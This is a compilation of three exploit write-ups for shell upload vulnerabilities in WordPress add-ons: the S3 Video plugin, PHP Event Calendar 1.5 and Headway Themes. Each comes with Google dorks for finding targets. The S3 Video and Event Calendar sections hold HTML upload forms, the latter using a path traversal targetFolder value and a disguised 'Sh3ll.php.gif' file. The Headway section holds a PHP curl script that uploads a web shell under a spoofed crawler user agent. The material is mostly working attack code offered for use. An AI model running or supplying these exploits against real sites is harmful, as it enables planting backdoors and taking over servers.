WordPress Plugins S3 Video Remote Shell Upload

#- Title: WordPress Plugin S3 Video Remote Shell Upload

#- Author: Manish Kishan Tanwar AKA error1046

#- Date: 9/12/2015

#- Developer : Anthony Mills

#- Link Download : Wordpress. org/plugins/s3-video/

#- Google Dork: inurl:wp-content/plugins/s3-video/

#- Tested on : Win 8.1 RT

#- Fixed in Version : > 0.91

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Vulrnerability : 

/wp-content/plugins/s3-video/includes/uploadify.php

Description : 

Wordpress plugins S3 Video is suffer from uploadify vulnerability remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.

Solution:

Upgrade new version of patch

-- Proof Of Concept --

You can use remote (xampp) , but i'd do simple way.. i will use csrf method.

Code : 

<form method=post action="http://www.3xploi7. com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>

Shell Path : Here !!

WordPress PHP Event Calendar 1.5 Arbitrary File Upload

#- Title: WordPress PHP Event Calendar Arbitrary File Upload

#- Author: CrashBandicot

#- Date: 04/02/2015

#- Vendor : phpeventcalendar. com

#- Developer : -

#- Link Download : Wordpress. org/plugins/php-event-calendar/

#- Google Dork: inurl:wp-content/plugins/php-event-calendar/

#- Tested on : MSwin

#- Fixed in Version : > 1.5

=======================================================================

 &- Vulnerability : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php ( "Uploadify.php" )

Bug Code :

<?php

/*

Uploadify

Copyright (c) 2012 Reactive Apps, Ronnie Garcia

Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>

*/

// Define a destination

//$targetFolder = '/uploads'; // Relative to the root

$targetFolder = $_POST['targetFolder']; // wp upload directory

$dir = str_replace('\\','/',dirname(__FILE__));

//$verifyToken = md5('unique_salt' . $_POST['timestamp']);

if (!empty($_FILES)) {

    $tempFile = $_FILES['Filedata']['tmp_name'];

    //$targetPath = $dir.$targetFolder;

    $targetPath = $targetFolder;

    $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];

    $targetFile = rtrim($targetPath,'/') . '/' . $fileName;

    // Validate the file type

    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions

    $fileParts = pathinfo($_FILES['Filedata']['name']);

    if (in_array($fileParts['extension'],$fileTypes)) {

        move_uploaded_file($tempFile,$targetFile);

        echo '1';

    } else {

        echo 'Invalid file type.';



    }

&- When Vulnerable : *Blank*

Proof Of Concept :

Material : Sh3ll.php.gif (if support) / Upload image.gif

HTML Code : 

<div><form action="http://3xploi7.com/wp-content/plugins/php-event-calendar/server/classes/uploadify.php"  method="post" enctype="multipart/form-data">
 <input type="file" name="Filedata" id="file" ><br>
 <input type="text" name="targetFolder" value="../../../../../" id="file" ><br>
 <input type="text" name="user_id" value="3xploi7" id="file" ><br>
 <input type="submit" name="submit" value="3xploi7ed !" >
</form></div>

Shell Acces ? Here

Wordpress Headway Themes Shell Upload Vulnerability

#-Title: Wordpress Headway Themes Shell Upload Vulnerability

#-Author: Anonymously

#-Date: 10/27/2015

#- Vendor : headwaythemes. com

#- Developer : Clay Griffith

#- Link Download : headwaythemes. com/pricing/

#-Google Dork: inurl:wp-content/themes/headway-(random)

#- Tested on : Trusty Tahr

#- Fixed in ??

==========================================================================

·        Vulnerability : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php 

·         When Vulnerable : /home/localhost/public_html/

Proof Of Concept :

Tools Coded by Mr.MaGnoM

<?php

/*

link of tool with vedio : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html

coded by mr magnom

more tools visit my blog  ==> magsec.blogspot.com  :)

so why i didnt make auto exploiter because theme headway dont have one name

for example u will filn /headway-2014/ and  /headway-2015/ or /headway-163/  , /headway-120/

so is soo defficult to make auto exploiter so u must cheek firstly complet name of theme than

write it on site.com/wp-content/themes/headway(complet name)/library/visual-editor/lib/upload-header.php

shell go to  : site/wp-content/uploads/headway/header-uploads/shell is stabl for all site

that script on php for exploit site by site :/

to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html

*/

$url="3xploi7.id"; // link here

$file="lolz.php ";   // ur shell here

$post = array('Filedata'=>"@$file") ;

$ch = curl_init();

curl_setopt ($ch, CURLOPT_URL, "$url");

curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,$post);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

$data = curl_exec($ch);

curl_close($ch);

//print $data;

if($data=="1"){

  echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";

}else{

  echo "\nnot infected\n";

}

?>

Shell Acces ?  Here